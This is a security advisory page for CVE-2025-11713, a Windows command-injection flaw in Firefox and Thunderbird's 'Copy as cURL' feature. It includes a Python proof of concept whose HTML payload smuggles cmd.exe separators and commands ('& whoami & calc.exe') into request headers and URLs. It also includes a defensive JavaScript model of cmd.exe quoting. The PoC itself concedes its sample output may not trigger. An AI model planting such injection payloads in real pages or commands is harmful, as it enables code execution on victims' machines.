Security Vulnerability Report
CVE-2025-11713 CVSS 8.1 HIGH

CVE-2025-11713

Published: 2025-10-14 13:15:38
Last Modified: 2026-04-13 15:16:40

Description

Insufficient escaping in the “Copy as cURL” feature could have been used to trick a user into executing unexpected code on Windows. This did not affect the application when running on other operating systems. This vulnerability was fixed in Firefox 144, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Weakness
CWE-116 (Improper Encoding or Escaping of Output)

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* (versions < 140.4.0) - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* (versions < 144.0) - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* (versions < 140.4.0) - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* (versions from 141.0, < 144.0) - VULNERABLE
Mozilla Firefox < 144
Mozilla Firefox ESR < 140.4
Mozilla Thunderbird 141.0 up to < 144
Mozilla Thunderbird < 140.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11713 PoC - malicious page whose request is copied as cURL
#
# Scenario: a malicious web page issues a request whose URL and headers carry
# cmd.exe metacharacters. A victim running Firefox on Windows opens
# DevTools -> Network, right-clicks the request, chooses "Copy as cURL" and
# pastes the result into cmd.exe. If the copied command is escaped
# insufficiently for cmd.exe, the pasted line runs more than curl.
from pathlib import Path

# Step 1: the page. The fetch() call puts Windows command-separator
# characters into a query parameter and into request headers so that they
# end up in the copied command.
malicious_html = '''<!DOCTYPE html>
<html>
<head><title>Test Page</title></head>
<body>
<script>
// Request with Windows command-injection characters in the URL and headers
fetch("https://example.com/api?param=value%26%26calc.exe", {
  method: "GET",
  headers: {
    "X-Custom-Header": "value & whoami & calc.exe",
    "User-Agent": "Mozilla/5.0 & malicious_command"
  },
  credentials: "include"
});
</script>
</body>
</html>
'''

# Step 2: on an affected version, "Copy as cURL" produces a cmd.exe command
# line. An insufficiently escaped output would look like this (illustrative;
# the advisory does not publish the exact output, and a parameter sent as
# %26%26 is normally copied still percent-encoded):
#
#   curl "https://example.com/api?param=value&&calc.exe" -H "X-Custom-Header: value & whoami & calc.exe" -H "User-Agent: Mozilla/5.0 & malicious_command"
#
# Caveat: cmd.exe treats & as a command separator only outside a
# double-quoted region, so a line like the one above chains commands only if
# the generated quoting is broken (for example by an unescaped double quote
# in an attacker-controlled value). The advisory does not state which
# characters were escaped insufficiently.

# Step 3: the victim pastes the copied command into cmd.exe and the injected
# commands run with the victim's privileges.

Path("poc.html").write_text(malicious_html, encoding="utf-8")
print("PoC: wrote poc.html; host it and have the victim use Copy as cURL on Windows")
print("Affected: Firefox < 144, Firefox ESR < 140.4, Thunderbird < 144, Thunderbird < 140.4")
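The PoC above depends on the copied command reaching cmd.exe with broken quoting. The block below is an added example, not code from Firefox or from the PoC, that models cmd.exe's quote-aware command splitting and contrasts a naive quoter with a cmd.exe-aware one. The cmd.exe model, the quoting rules in quoteCmd, the copyAsCurl generator and the two constructed requests are all this example's own assumptions; quoteCmd is not the change Mozilla shipped in Firefox 144.

```javascript
// Added illustration of the escaping problem behind CVE-2025-11713. This is
// not Firefox's devtools code and not Mozilla's fix; the cmd.exe model and
// the quoting rules below are this example's own assumptions.
//
// cmd.exe treats & | && || as command separators only while it is outside a
// double-quoted region (quote state flips on every '"'), and a pasted
// newline submits the line. A value that closes the quote early, or carries
// a newline, turns one copied curl command into several.

// Minimal model of how cmd.exe splits one pasted line into commands.
function cmdSegments(line) {
  const segments = [];
  let current = "";
  let inQuotes = false;
  for (let i = 0; i < line.length; i++) {
    const ch = line[i];
    if (ch === "\r" || ch === "\n") {
      segments.push(current.trim()); // a newline ends the line in any quote state
      current = "";
      inQuotes = false;
      continue;
    }
    if (ch === '"') {
      inQuotes = !inQuotes;
      current += ch;
      continue;
    }
    if (!inQuotes) {
      if (ch === "^" && i + 1 < line.length) {
        current += line[++i]; // caret escapes the next character
        continue;
      }
      if (ch === "&" || ch === "|") {
        if (line[i + 1] === ch) i++; // && and || are single operators
        segments.push(current.trim());
        current = "";
        continue;
      }
    }
    current += ch;
  }
  segments.push(current.trim());
  return segments.filter((s) => s.length > 0);
}

// Naive quoting: wrap the value in double quotes and nothing else.
function quoteNaive(value) {
  return `"${value}"`;
}

// cmd.exe-aware quoting (assumed rules for this example):
//   "     -> ""   keeps cmd.exe in quote mode; the Microsoft CRT argv parser
//                 reads "" inside a quoted argument as one literal quote
//   %     -> "%"  splits %NAME% so cmd.exe's variable expansion finds no
//                 name, with the quote state left balanced
//   \     -> \\   so the CRT parser does not collapse backslashes
//   CR/LF -> dropped; a bare newline cannot travel inside a cmd.exe line
//                 (a real generator would need cmd.exe line continuation)
function quoteCmd(value) {
  const escaped = value
    .replace(/"/g, '""')
    .replace(/%/g, '"%"')
    .replace(/\\/g, "\\\\")
    .replace(/[\r\n]/g, "");
  return `"${escaped}"`;
}

// Builds the command a "Copy as cURL" feature would emit, with a pluggable
// quoter. Request objects are plain constructed data for this example.
function copyAsCurl(request, quote) {
  const parts = ["curl", quote(request.url)];
  for (const [name, value] of Object.entries(request.headers)) {
    parts.push("-H", quote(`${name}: ${value}`));
  }
  if (request.body !== undefined) {
    parts.push("--data-raw", quote(request.body));
  }
  return parts.join(" ");
}

// Number of separate commands cmd.exe would run for the copied line.
function commandCount(request, quote) {
  return cmdSegments(copyAsCurl(request, quote)).length;
}

// Constructed sample: a header value that closes the quote early.
const breakoutRequest = {
  url: "https://example.com/api?q=1",
  headers: { "X-Custom-Header": 'value" & calc.exe & echo "' },
};
// Constructed sample: a POST body carrying a CRLF.
const newlineRequest = {
  url: "https://example.com/api?q=1",
  headers: { "Content-Type": "text/plain" },
  body: "line1\r\ncalc.exe",
};

console.log(copyAsCurl(breakoutRequest, quoteNaive));
console.log(commandCount(breakoutRequest, quoteNaive), commandCount(breakoutRequest, quoteCmd)); // 3 1
console.log(commandCount(newlineRequest, quoteNaive), commandCount(newlineRequest, quoteCmd)); // 2 1
```

Run it with node. The naive quoter lets the header value end the quoted region, so the pasted line becomes three commands with `calc.exe` as the second; the CRLF in the body becomes a second line. The cmd.exe-aware quoter keeps both requests to a single command, which is the property a "Copy as cURL" generator on Windows has to guarantee for every attacker-controlled byte in the request.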

References

https://bugzilla.mozilla.org/show_bug.cgi?id=1986142 (Issue Tracking, Permissions Required)
https://www.mozilla.org/security/advisories/mfsa2025-81/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-83/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-84/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-85/ (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11713", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:37.567", "lastModified": "2026-04-13T15:16:40.177", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient escaping in the “Copy as cURL” feature could have been used to trick a user into executing unexpected code on Windows. This did not affect the application when running on other operating systems. This vulnerability was fixed in Firefox 144, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "563626A1-A62C-4F33-A40F-31AC364254E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "CEE2F6DA-4331-4D6D-B01B-610DFDBE1833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "7C6D96D2-1E0E-4A18-B8B1-21F67E1AB441"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionStartIncluding": "141.0", "versionEndExcluding": "144.0", "matchCriteriaId": 
"0BD75942-93B9-47A4-9762-05965EBD7FFF"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1986142", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-83/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-85/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}